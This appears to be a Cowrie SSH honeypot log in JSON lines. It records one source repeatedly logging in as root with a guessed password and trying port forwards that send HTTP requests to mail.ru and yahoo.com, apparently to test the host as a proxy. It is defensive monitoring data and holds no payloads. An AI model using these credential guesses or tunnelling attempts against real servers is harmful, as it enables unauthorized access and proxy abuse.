{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.764050Z","src_ip":"77.83.207.83","session":"7af41503ff30"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50670,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a06386b4791","protocol":"ssh","message":"New connection: 77.83.207.83:50670 (1.2.3.4:22) [session: 0a06386b4791]","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.813049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.814116Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:41.864232Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.114540Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7207,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7207","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.166206Z","session":"0a06386b4791"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.216506Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":17553,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17553","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.360482Z","session":"0a06386b4791"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.410647Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24362,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24362","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.552650Z","session":"0a06386b4791"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.602764Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.654147Z","src_ip":"77.83.207.83","session":"0a06386b4791"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50748,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb3d72aa5a84","protocol":"ssh","message":"New connection: 77.83.207.83:50748 (1.2.3.4:22) [session: bb3d72aa5a84]","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.703061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.703813Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:42.754143Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.004811Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27876,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27876","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.056424Z","session":"bb3d72aa5a84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.106823Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":13845,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13845","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.248867Z","session":"bb3d72aa5a84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.299413Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":9272,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9272","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.440772Z","session":"bb3d72aa5a84"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.491053Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.542060Z","src_ip":"77.83.207.83","session":"bb3d72aa5a84"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50832,"dst_ip":"1.2.3.4","dst_port":22,"session":"6db8325b1851","protocol":"ssh","message":"New connection: 77.83.207.83:50832 (1.2.3.4:22) [session: 6db8325b1851]","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.591505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.602231Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.642477Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.893318Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24249,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24249","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.944621Z","session":"6db8325b1851"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:43.995328Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27405,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27405","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.136711Z","session":"6db8325b1851"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.187056Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":21159,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21159","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.328658Z","session":"6db8325b1851"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.378977Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.430536Z","src_ip":"77.83.207.83","session":"6db8325b1851"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":50930,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bf9fa28ee44","protocol":"ssh","message":"New connection: 77.83.207.83:50930 (1.2.3.4:22) [session: 8bf9fa28ee44]","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.479710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.480558Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.530575Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.781049Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9616,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:9616","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.832367Z","session":"8bf9fa28ee44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:44.882639Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":9888,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9888","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.024576Z","session":"8bf9fa28ee44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.074852Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5811,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5811","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.216471Z","session":"8bf9fa28ee44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.266716Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.317405Z","src_ip":"77.83.207.83","session":"8bf9fa28ee44"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51009,"dst_ip":"1.2.3.4","dst_port":22,"session":"5631c6c1331a","protocol":"ssh","message":"New connection: 77.83.207.83:51009 (1.2.3.4:22) [session: 5631c6c1331a]","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.365854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.376092Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.415595Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.663492Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32333,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32333","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.713951Z","session":"5631c6c1331a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.763667Z","src_ip":"77.83.207.83","session":"5631c6c1331a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":4483,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:4483","sensor":"my-vps","timestamp":"2025-08-31T03:45:45.903983Z","session":"5631c6c1331a"}
